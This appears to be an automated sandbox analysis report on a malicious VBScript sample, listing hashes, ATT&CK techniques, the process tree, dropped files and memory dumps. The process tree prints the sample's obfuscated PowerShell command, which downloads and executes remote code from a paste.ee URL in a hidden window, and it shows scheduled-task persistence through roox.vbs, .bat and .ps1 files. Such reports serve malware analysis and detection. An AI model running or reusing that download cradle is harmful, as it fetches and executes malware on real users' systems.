61c87dba4097e30afad29633ab28a75c53bbd848b2bc64a04387a5f4cd8d5ce9

General

Target

TK7.vbs
Size

15KB
MD5

0e424678845cfa1848e1716c4ae79db2
SHA1

7fbf779cab750e17c8ffef9e06963d4cecfa831c
SHA256

61c87dba4097e30afad29633ab28a75c53bbd848b2bc64a04387a5f4cd8d5ce9
SHA512

1b2e5fb9443389ae369aeece97cfa8d7dbeca0b9e8c586c5e90b70456281112560cb3e075b6a1218d16b691190fd1e9dd92670ad552ca325a2506f05b01460f7
SSDEEP

192:r6K6O6d6L6+6o686+6U6/6m6VD61636U6D6X6H6K6Y6L6U6N6j6p6M6D6C666H6t:OA

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2700	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2700	powershell.exe
2392	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2700	powershell.exe
2392	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2704 wrote to memory of 2808	2704	WScript.exe	30
PID 2704 wrote to memory of 2808	2704	WScript.exe	30
PID 2704 wrote to memory of 2808	2704	WScript.exe	30
PID 2808 wrote to memory of 2700	2808	cmd.exe	32
PID 2808 wrote to memory of 2700	2808	cmd.exe	32
PID 2808 wrote to memory of 2700	2808	cmd.exe	32
PID 1888 wrote to memory of 1768	1888	taskeng.exe	35
PID 1888 wrote to memory of 1768	1888	taskeng.exe	35
PID 1888 wrote to memory of 1768	1888	taskeng.exe	35
PID 1768 wrote to memory of 1092	1768	WScript.exe	36
PID 1768 wrote to memory of 1092	1768	WScript.exe	36
PID 1768 wrote to memory of 1092	1768	WScript.exe	36
PID 1092 wrote to memory of 2392	1092	cmd.exe	38
PID 1092 wrote to memory of 2392	1092	cmd.exe	38
PID 1092 wrote to memory of 2392	1092	cmd.exe	38

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TK7.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2704
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/r/HzyuN/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/r/HzyuN/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2700

C:\Windows\system32\taskeng.exe
taskeng.exe {21911F89-E928-4E8B-914A-86AEBD86496F} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Public\roox.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\System32\cmd.exe
    cmd /c ""C:\Users\Public\roox.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\roox.ps1'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a76dc6480fb49a12b624624224caef91

SHA1
ca28ddee85332f98a2b1c83a457c18d3f903a447

SHA256
0fbbb8843c719659df70c1e4020eac1bf81b35523bf283f94339e4139e12c3aa

SHA512
1862dd91bfa48bdc7786668178ea56e33d8fbe9029fb808d68dc36e63e2687e76b8762d955c6b512f9f4e1f6fbc6f962b25f2dc9cdaf55ea00e3c8e2103ee0e7

Download Submit
C:\Users\Public\roox.bat

Filesize
189B

MD5
252132ac509819fd013a4f235964aa56

SHA1
c4b9f8acd8aa446c777c3adbc7b79f81bb1df490

SHA256
9018a2f6018b6948fc134490c3fb93c945f10d89652db7d8491a98790d001c1e

SHA512
1927902c952da4490368257545c13b1899c46e9f3b30b99da5b947b0ebde8411639f5e3a53b7e1c62707df6e7fe86d025b5e784b6c66fa103fe22e39df559327

Download Submit
C:\Users\Public\roox.ps1

Filesize
689KB

MD5
ee293b5fd99d2dceccb0e0872c82c0ad

SHA1
4636ef7871d889d59d52d4d75e1f44acf4b6fcdc

SHA256
82f9f9999852fa8c9272f2b033f95be9f64cb1032003f206f31ab56b3d00bcbb

SHA512
e612d95b905471724d49f4401a1a0168efbac90e64f33f80176dec80b748dbb1420f6dd8a0accb4b15f946e2f37acb1b7be67a60f68555d652cd9fcde85e4b92

Download Submit
C:\Users\Public\roox.vbs

Filesize
659B

MD5
d0e4524918bde99e070e852de31893ea

SHA1
ae662b541d2df77df3d3068f7e4fbb60320af469

SHA256
d50cfca93637af25dc6720ebf40d54eec874004776b6bc385d544561748c2ffc

SHA512
07a54d952346cb579e58f5578713bd564a79028b7453c33d4763ed13fbf918432b536d35a7be4a1967ec428e529fe88a9a5ae97ba903da455e6d97f79951e3aa

Download Submit
memory/2392-24-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2392-23-0x000000001B820000-0x000000001BB02000-memory.dmp

Filesize
2.9MB

Download
memory/2700-7-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2700-11-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2700-15-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2700-10-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2700-9-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2700-8-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2700-4-0x000007FEF603E000-0x000007FEF603F000-memory.dmp

Filesize
4KB

Download
memory/2700-6-0x0000000002A10000-0x0000000002A18000-memory.dmp

Filesize
32KB

Download
memory/2700-5-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing